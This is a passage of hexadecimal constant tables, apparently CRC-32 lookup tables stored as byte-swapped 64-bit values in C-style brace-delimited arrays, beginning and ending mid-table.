0xcf0dd6dc00000000, 0x593dd1ab00000000, 0xac30d92600000000, 0x3a00de5100000000, 0x8051d7c800000000, 0x1661d0bf00000000, 0xb5f4b42100000000, 0x23c4b35600000000, 0x9995bacf00000000, 0x0fa5bdb800000000, 0x9eb8022800000000, 0x0888055f00000000, 0xb2d90cc600000000, 0x24e90bb100000000, 0x877c6f2f00000000, 0x114c685800000000, 0xab1d61c100000000, 0x3d2d66b600000000, 0x9041dc7600000000, 0x0671db0100000000, 0xbc20d29800000000, 0x2a10d5ef00000000, 0x8985b17100000000, 0x1fb5b60600000000, 0xa5e4bf9f00000000, 0x33d4b8e800000000, 0xa2c9077800000000, 0x34f9000f00000000, 0x8ea8099600000000, 
0x18980ee100000000, 0xbb0d6a7f00000000, 0x2d3d6d0800000000, 0x976c649100000000, 0x015c63e600000000, 0xf4516b6b00000000, 0x62616c1c00000000, 0xd830658500000000, 0x4e0062f200000000, 0xed95066c00000000, 0x7ba5011b00000000, 0xc1f4088200000000, 0x57c40ff500000000, 0xc6d9b06500000000, 0x50e9b71200000000, 0xeab8be8b00000000, 0x7c88b9fc00000000, 0xdf1ddd6200000000, 0x492dda1500000000, 0xf37cd38c00000000, 0x654cd4fb00000000, 0x5861b24d00000000, 0xce51b53a00000000, 0x7400bca300000000, 0xe230bbd400000000, 0x41a5df4a00000000, 0xd795d83d00000000, 0x6dc4d1a400000000, 0xfbf4d6d300000000, 0x6ae9694300000000, 0xfcd96e3400000000, 0x468867ad00000000, 0xd0b860da00000000, 0x732d044400000000, 0xe51d033300000000, 0x5f4c0aaa00000000, 0xc97c0ddd00000000, 0x3c71055000000000, 0xaa41022700000000, 0x10100bbe00000000, 0x86200cc900000000, 0x25b5685700000000, 0xb3856f2000000000, 0x09d466b900000000, 0x9fe461ce00000000, 0x0ef9de5e00000000, 0x98c9d92900000000, 0x2298d0b000000000, 0xb4a8d7c700000000, 0x173db35900000000, 0x810db42e00000000, 0x3b5cbdb700000000, 0xad6cbac000000000, 0x2083b8ed00000000, 0xb6b3bf9a00000000, 0x0ce2b60300000000, 0x9ad2b17400000000, 0x3947d5ea00000000, 0xaf77d29d00000000, 0x1526db0400000000, 0x8316dc7300000000, 0x120b63e300000000, 0x843b649400000000, 0x3e6a6d0d00000000, 0xa85a6a7a00000000, 0x0bcf0ee400000000, 0x9dff099300000000, 0x27ae000a00000000, 0xb19e077d00000000, 0x44930ff000000000, 0xd2a3088700000000, 0x68f2011e00000000, 0xfec2066900000000, 0x5d5762f700000000, 0xcb67658000000000, 0x71366c1900000000, 0xe7066b6e00000000, 0x761bd4fe00000000, 0xe02bd38900000000, 0x5a7ada1000000000, 0xcc4add6700000000, 0x6fdfb9f900000000, 0xf9efbe8e00000000, 0x43beb71700000000, 0xd58eb06000000000, 0xe8a3d6d600000000, 0x7e93d1a100000000, 0xc4c2d83800000000, 0x52f2df4f00000000, 0xf167bbd100000000, 0x6757bca600000000, 0xdd06b53f00000000, 0x4b36b24800000000, 0xda2b0dd800000000, 0x4c1b0aaf00000000, 0xf64a033600000000, 0x607a044100000000, 0xc3ef60df00000000, 0x55df67a800000000, 0xef8e6e3100000000, 
0x79be694600000000, 0x8cb361cb00000000, 0x1a8366bc00000000, 0xa0d26f2500000000, 0x36e2685200000000, 0x95770ccc00000000, 0x03470bbb00000000, 0xb916022200000000, 0x2f26055500000000, 0xbe3bbac500000000, 0x280bbdb200000000, 0x925ab42b00000000, 0x046ab35c00000000, 0xa7ffd7c200000000, 0x31cfd0b500000000, 0x8b9ed92c00000000, 0x1daede5b00000000, 0xb0c2649b00000000, 0x26f263ec00000000, 0x9ca36a7500000000, 0x0a936d0200000000, 0xa906099c00000000, 0x3f360eeb00000000, 0x8567077200000000, 0x1357000500000000, 0x824abf9500000000, 0x147ab8e200000000, 0xae2bb17b00000000, 0x381bb60c00000000, 0x9b8ed29200000000, 0x0dbed5e500000000, 0xb7efdc7c00000000, 0x21dfdb0b00000000, 0xd4d2d38600000000, 0x42e2d4f100000000, 0xf8b3dd6800000000, 0x6e83da1f00000000, 0xcd16be8100000000, 0x5b26b9f600000000, 0xe177b06f00000000, 0x7747b71800000000, 0xe65a088800000000, 0x706a0fff00000000, 0xca3b066600000000, 0x5c0b011100000000, 0xff9e658f00000000, 0x69ae62f800000000, 0xd3ff6b6100000000, 0x45cf6c1600000000, 0x78e20aa000000000, 0xeed20dd700000000, 0x5483044e00000000, 0xc2b3033900000000, 0x612667a700000000, 0xf71660d000000000, 0x4d47694900000000, 0xdb776e3e00000000, 0x4a6ad1ae00000000, 0xdc5ad6d900000000, 0x660bdf4000000000, 0xf03bd83700000000, 0x53aebca900000000, 0xc59ebbde00000000, 0x7fcfb24700000000, 0xe9ffb53000000000, 0x1cf2bdbd00000000, 0x8ac2baca00000000, 0x3093b35300000000, 0xa6a3b42400000000, 0x0536d0ba00000000, 0x9306d7cd00000000, 0x2957de5400000000, 0xbf67d92300000000, 0x2e7a66b300000000, 0xb84a61c400000000, 0x021b685d00000000, 0x942b6f2a00000000, 0x37be0bb400000000, 0xa18e0cc300000000, 0x1bdf055a00000000, 0x8def022d00000000}, {0x0000000000000000, 0x41311b1900000000, 0x8262363200000000, 0xc3532d2b00000000, 0x04c56c6400000000, 0x45f4777d00000000, 0x86a75a5600000000, 0xc796414f00000000, 0x088ad9c800000000, 0x49bbc2d100000000, 0x8ae8effa00000000, 0xcbd9f4e300000000, 0x0c4fb5ac00000000, 0x4d7eaeb500000000, 0x8e2d839e00000000, 0xcf1c988700000000, 0x5112c24a00000000, 0x1023d95300000000, 
0xd370f47800000000, 0x9241ef6100000000, 0x55d7ae2e00000000, 0x14e6b53700000000, 0xd7b5981c00000000, 0x9684830500000000, 0x59981b8200000000, 0x18a9009b00000000, 0xdbfa2db000000000, 0x9acb36a900000000, 0x5d5d77e600000000, 0x1c6c6cff00000000, 0xdf3f41d400000000, 0x9e0e5acd00000000, 0xa224849500000000, 0xe3159f8c00000000, 0x2046b2a700000000, 0x6177a9be00000000, 0xa6e1e8f100000000, 0xe7d0f3e800000000, 0x2483dec300000000, 0x65b2c5da00000000, 0xaaae5d5d00000000, 0xeb9f464400000000, 0x28cc6b6f00000000, 0x69fd707600000000, 0xae6b313900000000, 0xef5a2a2000000000, 0x2c09070b00000000, 0x6d381c1200000000, 0xf33646df00000000, 0xb2075dc600000000, 0x715470ed00000000, 0x30656bf400000000, 0xf7f32abb00000000, 0xb6c231a200000000, 0x75911c8900000000, 0x34a0079000000000, 0xfbbc9f1700000000, 0xba8d840e00000000, 0x79dea92500000000, 0x38efb23c00000000, 0xff79f37300000000, 0xbe48e86a00000000, 0x7d1bc54100000000, 0x3c2ade5800000000, 0x054f79f000000000, 0x447e62e900000000, 0x872d4fc200000000, 0xc61c54db00000000, 0x018a159400000000, 0x40bb0e8d00000000, 0x83e823a600000000, 0xc2d938bf00000000, 0x0dc5a03800000000, 0x4cf4bb2100000000, 0x8fa7960a00000000, 0xce968d1300000000, 0x0900cc5c00000000, 0x4831d74500000000, 0x8b62fa6e00000000, 0xca53e17700000000, 0x545dbbba00000000, 0x156ca0a300000000, 0xd63f8d8800000000, 0x970e969100000000, 0x5098d7de00000000, 0x11a9ccc700000000, 0xd2fae1ec00000000, 0x93cbfaf500000000, 0x5cd7627200000000, 0x1de6796b00000000, 0xdeb5544000000000, 0x9f844f5900000000, 0x58120e1600000000, 0x1923150f00000000, 0xda70382400000000, 0x9b41233d00000000, 0xa76bfd6500000000, 0xe65ae67c00000000, 0x2509cb5700000000, 0x6438d04e00000000, 0xa3ae910100000000, 0xe29f8a1800000000, 0x21cca73300000000, 0x60fdbc2a00000000, 0xafe124ad00000000, 0xeed03fb400000000, 0x2d83129f00000000, 0x6cb2098600000000, 0xab2448c900000000, 0xea1553d000000000, 0x29467efb00000000, 0x687765e200000000, 0xf6793f2f00000000, 0xb748243600000000, 0x741b091d00000000, 0x352a120400000000, 0xf2bc534b00000000, 0xb38d485200000000, 
0x70de657900000000, 0x31ef7e6000000000, 0xfef3e6e700000000, 0xbfc2fdfe00000000, 0x7c91d0d500000000, 0x3da0cbcc00000000, 0xfa368a8300000000, 0xbb07919a00000000, 0x7854bcb100000000, 0x3965a7a800000000, 0x4b98833b00000000, 0x0aa9982200000000, 0xc9fab50900000000, 0x88cbae1000000000, 0x4f5def5f00000000, 0x0e6cf44600000000, 0xcd3fd96d00000000, 0x8c0ec27400000000, 0x43125af300000000, 0x022341ea00000000, 0xc1706cc100000000, 0x804177d800000000, 0x47d7369700000000, 0x06e62d8e00000000, 0xc5b500a500000000, 0x84841bbc00000000, 0x1a8a417100000000, 0x5bbb5a6800000000, 0x98e8774300000000, 0xd9d96c5a00000000, 0x1e4f2d1500000000, 0x5f7e360c00000000, 0x9c2d1b2700000000, 0xdd1c003e00000000, 0x120098b900000000, 0x533183a000000000, 0x9062ae8b00000000, 0xd153b59200000000, 0x16c5f4dd00000000, 0x57f4efc400000000, 0x94a7c2ef00000000, 0xd596d9f600000000, 0xe9bc07ae00000000, 0xa88d1cb700000000, 0x6bde319c00000000, 0x2aef2a8500000000, 0xed796bca00000000, 0xac4870d300000000, 0x6f1b5df800000000, 0x2e2a46e100000000, 0xe136de6600000000, 0xa007c57f00000000, 0x6354e85400000000, 0x2265f34d00000000, 0xe5f3b20200000000, 0xa4c2a91b00000000, 0x6791843000000000, 0x26a09f2900000000, 0xb8aec5e400000000, 0xf99fdefd00000000, 0x3accf3d600000000, 0x7bfde8cf00000000, 0xbc6ba98000000000, 0xfd5ab29900000000, 0x3e099fb200000000, 0x7f3884ab00000000, 0xb0241c2c00000000, 0xf115073500000000, 0x32462a1e00000000, 0x7377310700000000, 0xb4e1704800000000, 0xf5d06b5100000000, 0x3683467a00000000, 0x77b25d6300000000, 0x4ed7facb00000000, 0x0fe6e1d200000000, 0xccb5ccf900000000, 0x8d84d7e000000000, 0x4a1296af00000000, 0x0b238db600000000, 0xc870a09d00000000, 0x8941bb8400000000, 0x465d230300000000, 0x076c381a00000000, 0xc43f153100000000, 0x850e0e2800000000, 0x42984f6700000000, 0x03a9547e00000000, 0xc0fa795500000000, 0x81cb624c00000000, 0x1fc5388100000000, 0x5ef4239800000000, 0x9da70eb300000000, 0xdc9615aa00000000, 0x1b0054e500000000, 0x5a314ffc00000000, 0x996262d700000000, 0xd85379ce00000000, 0x174fe14900000000, 0x567efa5000000000, 
0x952dd77b00000000, 0xd41ccc6200000000, 0x138a8d2d00000000, 0x52bb963400000000, 0x91e8bb1f00000000, 0xd0d9a00600000000, 0xecf37e5e00000000, 0xadc2654700000000, 0x6e91486c00000000, 0x2fa0537500000000, 0xe836123a00000000, 0xa907092300000000, 0x6a54240800000000, 0x2b653f1100000000, 0xe479a79600000000, 0xa548bc8f00000000, 0x661b91a400000000, 0x272a8abd00000000, 0xe0bccbf200000000, 0xa18dd0eb00000000, 0x62defdc000000000, 0x23efe6d900000000, 0xbde1bc1400000000, 0xfcd0a70d00000000, 0x3f838a2600000000, 0x7eb2913f00000000, 0xb924d07000000000, 0xf815cb6900000000, 0x3b46e64200000000, 0x7a77fd5b00000000, 0xb56b65dc00000000, 0xf45a7ec500000000, 0x370953ee00000000, 0x763848f700000000, 0xb1ae09b800000000, 0xf09f12a100000000, 0x33cc3f8a00000000, 0x72fd249300000000}, {0x0000000000000000, 0x376ac20100000000, 0x6ed4840300000000, 0x59be460200000000, 0xdca8090700000000, 0xebc2cb0600000000, 0xb27c8d0400000000, 0x85164f0500000000, 0xb851130e00000000, 0x8f3bd10f00000000, 0xd685970d00000000, 0xe1ef550c00000000, 0x64f91a0900000000, 0x5393d80800000000, 0x0a2d9e0a00000000, 0x3d475c0b00000000, 0x70a3261c00000000, 0x47c9e41d00000000, 0x1e77a21f00000000, 0x291d601e00000000, 0xac0b2f1b00000000, 0x9b61ed1a00000000, 0xc2dfab1800000000, 0xf5b5691900000000, 0xc8f2351200000000, 0xff98f71300000000, 0xa626b11100000000, 0x914c731000000000, 0x145a3c1500000000, 0x2330fe1400000000, 0x7a8eb81600000000, 0x4de47a1700000000, 0xe0464d3800000000, 0xd72c8f3900000000, 0x8e92c93b00000000, 0xb9f80b3a00000000, 0x3cee443f00000000, 0x0b84863e00000000, 0x523ac03c00000000, 0x6550023d00000000, 0x58175e3600000000, 0x6f7d9c3700000000, 0x36c3da3500000000, 0x01a9183400000000, 0x84bf573100000000, 0xb3d5953000000000, 0xea6bd33200000000, 0xdd01113300000000, 0x90e56b2400000000, 0xa78fa92500000000, 0xfe31ef2700000000, 0xc95b2d2600000000, 0x4c4d622300000000, 0x7b27a02200000000, 0x2299e62000000000, 0x15f3242100000000, 0x28b4782a00000000, 0x1fdeba2b00000000, 0x4660fc2900000000, 0x710a3e2800000000, 0xf41c712d00000000, 
0xc376b32c00000000, 0x9ac8f52e00000000, 0xada2372f00000000, 0xc08d9a7000000000, 0xf7e7587100000000, 0xae591e7300000000, 0x9933dc7200000000, 0x1c25937700000000, 0x2b4f517600000000, 0x72f1177400000000, 0x459bd57500000000, 0x78dc897e00000000, 0x4fb64b7f00000000, 0x16080d7d00000000, 0x2162cf7c00000000, 0xa474807900000000, 0x931e427800000000, 0xcaa0047a00000000, 0xfdcac67b00000000, 0xb02ebc6c00000000, 0x87447e6d00000000, 0xdefa386f00000000, 0xe990fa6e00000000, 0x6c86b56b00000000, 0x5bec776a00000000, 0x0252316800000000, 0x3538f36900000000, 0x087faf6200000000, 0x3f156d6300000000, 0x66ab2b6100000000, 0x51c1e96000000000, 0xd4d7a66500000000, 0xe3bd646400000000, 0xba03226600000000, 0x8d69e06700000000, 0x20cbd74800000000, 0x17a1154900000000, 0x4e1f534b00000000, 0x7975914a00000000, 0xfc63de4f00000000, 0xcb091c4e00000000, 0x92b75a4c00000000, 0xa5dd984d00000000, 0x989ac44600000000, 0xaff0064700000000, 0xf64e404500000000, 0xc124824400000000, 0x4432cd4100000000, 0x73580f4000000000, 0x2ae6494200000000, 0x1d8c8b4300000000, 0x5068f15400000000, 0x6702335500000000, 0x3ebc755700000000, 0x09d6b75600000000, 0x8cc0f85300000000, 0xbbaa3a5200000000, 0xe2147c5000000000, 0xd57ebe5100000000, 0xe839e25a00000000, 0xdf53205b00000000, 0x86ed665900000000, 0xb187a45800000000, 0x3491eb5d00000000, 0x03fb295c00000000, 0x5a456f5e00000000, 0x6d2fad5f00000000, 0x801b35e100000000, 0xb771f7e000000000, 0xeecfb1e200000000, 0xd9a573e300000000, 0x5cb33ce600000000, 0x6bd9fee700000000, 0x3267b8e500000000, 0x050d7ae400000000, 0x384a26ef00000000, 0x0f20e4ee00000000, 0x569ea2ec00000000, 0x61f460ed00000000, 0xe4e22fe800000000, 0xd388ede900000000, 0x8a36abeb00000000, 0xbd5c69ea00000000, 0xf0b813fd00000000, 0xc7d2d1fc00000000, 0x9e6c97fe00000000, 0xa90655ff00000000, 0x2c101afa00000000, 0x1b7ad8fb00000000, 0x42c49ef900000000, 0x75ae5cf800000000, 0x48e900f300000000, 0x7f83c2f200000000, 0x263d84f000000000, 0x115746f100000000, 0x944109f400000000, 0xa32bcbf500000000, 0xfa958df700000000, 0xcdff4ff600000000, 0x605d78d900000000, 
0x5737bad800000000, 0x0e89fcda00000000, 0x39e33edb00000000, 0xbcf571de00000000, 0x8b9fb3df00000000, 0xd221f5dd00000000, 0xe54b37dc00000000, 0xd80c6bd700000000, 0xef66a9d600000000, 0xb6d8efd400000000, 0x81b22dd500000000, 0x04a462d000000000, 0x33cea0d100000000, 0x6a70e6d300000000, 0x5d1a24d200000000, 0x10fe5ec500000000, 0x27949cc400000000, 0x7e2adac600000000, 0x494018c700000000, 0xcc5657c200000000, 0xfb3c95c300000000, 0xa282d3c100000000, 0x95e811c000000000, 0xa8af4dcb00000000, 0x9fc58fca00000000, 0xc67bc9c800000000, 0xf1110bc900000000, 0x740744cc00000000, 0x436d86cd00000000, 0x1ad3c0cf00000000, 0x2db902ce00000000, 0x4096af9100000000, 0x77fc6d9000000000, 0x2e422b9200000000, 0x1928e99300000000, 0x9c3ea69600000000, 0xab54649700000000, 0xf2ea229500000000, 0xc580e09400000000, 0xf8c7bc9f00000000, 0xcfad7e9e00000000, 0x9613389c00000000, 0xa179fa9d00000000, 0x246fb59800000000, 0x1305779900000000, 0x4abb319b00000000, 0x7dd1f39a00000000, 0x3035898d00000000, 0x075f4b8c00000000, 0x5ee10d8e00000000, 0x698bcf8f00000000, 0xec9d808a00000000, 0xdbf7428b00000000, 0x8249048900000000, 0xb523c68800000000, 0x88649a8300000000, 0xbf0e588200000000, 0xe6b01e8000000000, 0xd1dadc8100000000, 0x54cc938400000000, 0x63a6518500000000, 0x3a18178700000000, 0x0d72d58600000000, 0xa0d0e2a900000000, 0x97ba20a800000000, 0xce0466aa00000000, 0xf96ea4ab00000000, 0x7c78ebae00000000, 0x4b1229af00000000, 0x12ac6fad00000000, 0x25c6adac00000000, 0x1881f1a700000000, 0x2feb33a600000000, 0x765575a400000000, 0x413fb7a500000000, 0xc429f8a000000000, 0xf3433aa100000000, 0xaafd7ca300000000, 0x9d97bea200000000, 0xd073c4b500000000, 0xe71906b400000000, 0xbea740b600000000, 0x89cd82b700000000, 0x0cdbcdb200000000, 0x3bb10fb300000000, 0x620f49b100000000, 0x55658bb000000000, 0x6822d7bb00000000, 0x5f4815ba00000000, 0x06f653b800000000, 0x319c91b900000000, 0xb48adebc00000000, 0x83e01cbd00000000, 0xda5e5abf00000000, 0xed3498be00000000}, {0x0000000000000000, 0x6567bcb800000000, 0x8bc809aa00000000, 0xeeafb51200000000, 
0x5797628f00000000, 0x32f0de3700000000, 0xdc5f6b2500000000, 0xb938d79d00000000, 0xef28b4c500000000, 0x8a4f087d00000000, 0x64e0bd6f00000000, 0x018701d700000000, 0xb8bfd64a00000000, 0xddd86af200000000, 0x3377dfe000000000, 0x5610635800000000, 0x9f57195000000000, 0xfa30a5e800000000, 0x149f10fa00000000, 0x71f8ac4200000000, 0xc8c07bdf00000000, 0xada7c76700000000, 0x4308727500000000, 0x266fcecd00000000, 0x707fad9500000000, 0x1518112d00000000, 0xfbb7a43f00000000, 0x9ed0188700000000, 0x27e8cf1a00000000, 0x428f73a200000000, 0xac20c6b000000000, 0xc9477a0800000000, 0x3eaf32a000000000, 0x5bc88e1800000000, 0xb5673b0a00000000, 0xd00087b200000000, 0x6938502f00000000, 0x0c5fec9700000000, 0xe2f0598500000000, 0x8797e53d00000000, 0xd187866500000000, 0xb4e03add00000000, 0x5a4f8fcf00000000, 0x3f28337700000000, 0x8610e4ea00000000, 0xe377585200000000, 0x0dd8ed4000000000, 0x68bf51f800000000, 0xa1f82bf000000000, 0xc49f974800000000, 0x2a30225a00000000, 0x4f579ee200000000, 0xf66f497f00000000, 0x9308f5c700000000, 0x7da740d500000000, 0x18c0fc6d00000000, 0x4ed09f3500000000, 0x2bb7238d00000000, 0xc518969f00000000, 0xa07f2a2700000000, 0x1947fdba00000000, 0x7c20410200000000, 0x928ff41000000000, 0xf7e848a800000000, 0x3d58149b00000000, 0x583fa82300000000, 0xb6901d3100000000, 0xd3f7a18900000000, 0x6acf761400000000, 0x0fa8caac00000000, 0xe1077fbe00000000, 0x8460c30600000000, 0xd270a05e00000000, 0xb7171ce600000000, 0x59b8a9f400000000, 0x3cdf154c00000000, 0x85e7c2d100000000, 0xe0807e6900000000, 0x0e2fcb7b00000000, 0x6b4877c300000000, 0xa20f0dcb00000000, 0xc768b17300000000, 0x29c7046100000000, 0x4ca0b8d900000000, 0xf5986f4400000000, 0x90ffd3fc00000000, 0x7e5066ee00000000, 0x1b37da5600000000, 0x4d27b90e00000000, 0x284005b600000000, 0xc6efb0a400000000, 0xa3880c1c00000000, 0x1ab0db8100000000, 0x7fd7673900000000, 0x9178d22b00000000, 0xf41f6e9300000000, 0x03f7263b00000000, 0x66909a8300000000, 0x883f2f9100000000, 0xed58932900000000, 0x546044b400000000, 0x3107f80c00000000, 0xdfa84d1e00000000, 0xbacff1a600000000, 
0xecdf92fe00000000, 0x89b82e4600000000, 0x67179b5400000000, 0x027027ec00000000, 0xbb48f07100000000, 0xde2f4cc900000000, 0x3080f9db00000000, 0x55e7456300000000, 0x9ca03f6b00000000, 0xf9c783d300000000, 0x176836c100000000, 0x720f8a7900000000, 0xcb375de400000000, 0xae50e15c00000000, 0x40ff544e00000000, 0x2598e8f600000000, 0x73888bae00000000, 0x16ef371600000000, 0xf840820400000000, 0x9d273ebc00000000, 0x241fe92100000000, 0x4178559900000000, 0xafd7e08b00000000, 0xcab05c3300000000, 0x3bb659ed00000000, 0x5ed1e55500000000, 0xb07e504700000000, 0xd519ecff00000000, 0x6c213b6200000000, 0x094687da00000000, 0xe7e932c800000000, 0x828e8e7000000000, 0xd49eed2800000000, 0xb1f9519000000000, 0x5f56e48200000000, 0x3a31583a00000000, 0x83098fa700000000, 0xe66e331f00000000, 0x08c1860d00000000, 0x6da63ab500000000, 0xa4e140bd00000000, 0xc186fc0500000000, 0x2f29491700000000, 0x4a4ef5af00000000, 0xf376223200000000, 0x96119e8a00000000, 0x78be2b9800000000, 0x1dd9972000000000, 0x4bc9f47800000000, 0x2eae48c000000000, 0xc001fdd200000000, 0xa566416a00000000, 0x1c5e96f700000000, 0x79392a4f00000000, 0x97969f5d00000000, 0xf2f123e500000000, 0x05196b4d00000000, 0x607ed7f500000000, 0x8ed162e700000000, 0xebb6de5f00000000, 0x528e09c200000000, 0x37e9b57a00000000, 0xd946006800000000, 0xbc21bcd000000000, 0xea31df8800000000, 0x8f56633000000000, 0x61f9d62200000000, 0x049e6a9a00000000, 0xbda6bd0700000000, 0xd8c101bf00000000, 0x366eb4ad00000000, 0x5309081500000000, 0x9a4e721d00000000, 0xff29cea500000000, 0x11867bb700000000, 0x74e1c70f00000000, 0xcdd9109200000000, 0xa8beac2a00000000, 0x4611193800000000, 0x2376a58000000000, 0x7566c6d800000000, 0x10017a6000000000, 0xfeaecf7200000000, 0x9bc973ca00000000, 0x22f1a45700000000, 0x479618ef00000000, 0xa939adfd00000000, 0xcc5e114500000000, 0x06ee4d7600000000, 0x6389f1ce00000000, 0x8d2644dc00000000, 0xe841f86400000000, 0x51792ff900000000, 0x341e934100000000, 0xdab1265300000000, 0xbfd69aeb00000000, 0xe9c6f9b300000000, 0x8ca1450b00000000, 0x620ef01900000000, 0x07694ca100000000, 
0xbe519b3c00000000, 0xdb36278400000000, 0x3599929600000000, 0x50fe2e2e00000000, 0x99b9542600000000, 0xfcdee89e00000000, 0x12715d8c00000000, 0x7716e13400000000, 0xce2e36a900000000, 0xab498a1100000000, 0x45e63f0300000000, 0x208183bb00000000, 0x7691e0e300000000, 0x13f65c5b00000000, 0xfd59e94900000000, 0x983e55f100000000, 0x2106826c00000000, 0x44613ed400000000, 0xaace8bc600000000, 0xcfa9377e00000000, 0x38417fd600000000, 0x5d26c36e00000000, 0xb389767c00000000, 0xd6eecac400000000, 0x6fd61d5900000000, 0x0ab1a1e100000000, 0xe41e14f300000000, 0x8179a84b00000000, 0xd769cb1300000000, 0xb20e77ab00000000, 0x5ca1c2b900000000, 0x39c67e0100000000, 0x80fea99c00000000, 0xe599152400000000, 0x0b36a03600000000, 0x6e511c8e00000000, 0xa716668600000000, 0xc271da3e00000000, 0x2cde6f2c00000000, 0x49b9d39400000000, 0xf081040900000000, 0x95e6b8b100000000, 0x7b490da300000000, 0x1e2eb11b00000000, 0x483ed24300000000, 0x2d596efb00000000, 0xc3f6dbe900000000, 0xa691675100000000, 0x1fa9b0cc00000000, 0x7ace0c7400000000, 0x9461b96600000000, 0xf10605de00000000}, {0x0000000000000000, 0xb029603d00000000, 0x6053c07a00000000, 0xd07aa04700000000, 0xc0a680f500000000, 0x708fe0c800000000, 0xa0f5408f00000000, 0x10dc20b200000000, 0xc14b703000000000, 0x7162100d00000000, 0xa118b04a00000000, 0x1131d07700000000, 0x01edf0c500000000, 0xb1c490f800000000, 0x61be30bf00000000, 0xd197508200000000, 0x8297e06000000000, 0x32be805d00000000, 0xe2c4201a00000000, 0x52ed402700000000, 0x4231609500000000, 0xf21800a800000000, 0x2262a0ef00000000, 0x924bc0d200000000, 0x43dc905000000000, 0xf3f5f06d00000000, 0x238f502a00000000, 0x93a6301700000000, 0x837a10a500000000, 0x3353709800000000, 0xe329d0df00000000, 0x5300b0e200000000, 0x042fc1c100000000, 0xb406a1fc00000000, 0x647c01bb00000000, 0xd455618600000000, 0xc489413400000000, 0x74a0210900000000, 0xa4da814e00000000, 0x14f3e17300000000, 0xc564b1f100000000, 0x754dd1cc00000000, 0xa537718b00000000, 0x151e11b600000000, 0x05c2310400000000, 0xb5eb513900000000, 0x6591f17e00000000, 
0xd5b8914300000000, 0x86b821a100000000, 0x3691419c00000000, 0xe6ebe1db00000000, 0x56c281e600000000, 0x461ea15400000000, 0xf637c16900000000, 0x264d612e00000000, 0x9664011300000000, 0x47f3519100000000, 0xf7da31ac00000000, 0x27a091eb00000000, 0x9789f1d600000000, 0x8755d16400000000, 0x377cb15900000000, 0xe706111e00000000, 0x572f712300000000, 0x4958f35800000000, 0xf971936500000000, 0x290b332200000000, 0x9922531f00000000, 0x89fe73ad00000000, 0x39d7139000000000, 0xe9adb3d700000000, 0x5984d3ea00000000, 0x8813836800000000, 0x383ae35500000000, 0xe840431200000000, 0x5869232f00000000, 0x48b5039d00000000, 0xf89c63a000000000, 0x28e6c3e700000000, 0x98cfa3da00000000, 0xcbcf133800000000, 0x7be6730500000000, 0xab9cd34200000000, 0x1bb5b37f00000000, 0x0b6993cd00000000, 0xbb40f3f000000000, 0x6b3a53b700000000, 0xdb13338a00000000, 0x0a84630800000000, 0xbaad033500000000, 0x6ad7a37200000000, 0xdafec34f00000000, 0xca22e3fd00000000, 0x7a0b83c000000000, 0xaa71238700000000, 0x1a5843ba00000000, 0x4d77329900000000, 0xfd5e52a400000000, 0x2d24f2e300000000, 0x9d0d92de00000000, 0x8dd1b26c00000000, 0x3df8d25100000000, 0xed82721600000000, 0x5dab122b00000000, 0x8c3c42a900000000, 0x3c15229400000000, 0xec6f82d300000000, 0x5c46e2ee00000000, 0x4c9ac25c00000000, 0xfcb3a26100000000, 0x2cc9022600000000, 0x9ce0621b00000000, 0xcfe0d2f900000000, 0x7fc9b2c400000000, 0xafb3128300000000, 0x1f9a72be00000000, 0x0f46520c00000000, 0xbf6f323100000000, 0x6f15927600000000, 0xdf3cf24b00000000, 0x0eaba2c900000000, 0xbe82c2f400000000, 0x6ef862b300000000, 0xded1028e00000000, 0xce0d223c00000000, 0x7e24420100000000, 0xae5ee24600000000, 0x1e77827b00000000, 0x92b0e6b100000000, 0x2299868c00000000, 0xf2e326cb00000000, 0x42ca46f600000000, 0x5216664400000000, 0xe23f067900000000, 0x3245a63e00000000, 0x826cc60300000000, 0x53fb968100000000, 0xe3d2f6bc00000000, 0x33a856fb00000000, 0x838136c600000000, 0x935d167400000000, 0x2374764900000000, 0xf30ed60e00000000, 0x4327b63300000000, 0x102706d100000000, 0xa00e66ec00000000, 0x7074c6ab00000000, 
0xc05da69600000000, 0xd081862400000000, 0x60a8e61900000000, 0xb0d2465e00000000, 0x00fb266300000000, 0xd16c76e100000000, 0x614516dc00000000, 0xb13fb69b00000000, 0x0116d6a600000000, 0x11caf61400000000, 0xa1e3962900000000, 0x7199366e00000000, 0xc1b0565300000000, 0x969f277000000000, 0x26b6474d00000000, 0xf6cce70a00000000, 0x46e5873700000000, 0x5639a78500000000, 0xe610c7b800000000, 0x366a67ff00000000, 0x864307c200000000, 0x57d4574000000000, 0xe7fd377d00000000, 0x3787973a00000000, 0x87aef70700000000, 0x9772d7b500000000, 0x275bb78800000000, 0xf72117cf00000000, 0x470877f200000000, 0x1408c71000000000, 0xa421a72d00000000, 0x745b076a00000000, 0xc472675700000000, 0xd4ae47e500000000, 0x648727d800000000, 0xb4fd879f00000000, 0x04d4e7a200000000, 0xd543b72000000000, 0x656ad71d00000000, 0xb510775a00000000, 0x0539176700000000, 0x15e537d500000000, 0xa5cc57e800000000, 0x75b6f7af00000000, 0xc59f979200000000, 0xdbe815e900000000, 0x6bc175d400000000, 0xbbbbd59300000000, 0x0b92b5ae00000000, 0x1b4e951c00000000, 0xab67f52100000000, 0x7b1d556600000000, 0xcb34355b00000000, 0x1aa365d900000000, 0xaa8a05e400000000, 0x7af0a5a300000000, 0xcad9c59e00000000, 0xda05e52c00000000, 0x6a2c851100000000, 0xba56255600000000, 0x0a7f456b00000000, 0x597ff58900000000, 0xe95695b400000000, 0x392c35f300000000, 0x890555ce00000000, 0x99d9757c00000000, 0x29f0154100000000, 0xf98ab50600000000, 0x49a3d53b00000000, 0x983485b900000000, 0x281de58400000000, 0xf86745c300000000, 0x484e25fe00000000, 0x5892054c00000000, 0xe8bb657100000000, 0x38c1c53600000000, 0x88e8a50b00000000, 0xdfc7d42800000000, 0x6feeb41500000000, 0xbf94145200000000, 0x0fbd746f00000000, 0x1f6154dd00000000, 0xaf4834e000000000, 0x7f3294a700000000, 0xcf1bf49a00000000, 0x1e8ca41800000000, 0xaea5c42500000000, 0x7edf646200000000, 0xcef6045f00000000, 0xde2a24ed00000000, 0x6e0344d000000000, 0xbe79e49700000000, 0x0e5084aa00000000, 0x5d50344800000000, 0xed79547500000000, 0x3d03f43200000000, 0x8d2a940f00000000, 0x9df6b4bd00000000, 0x2ddfd48000000000, 0xfda574c700000000, 
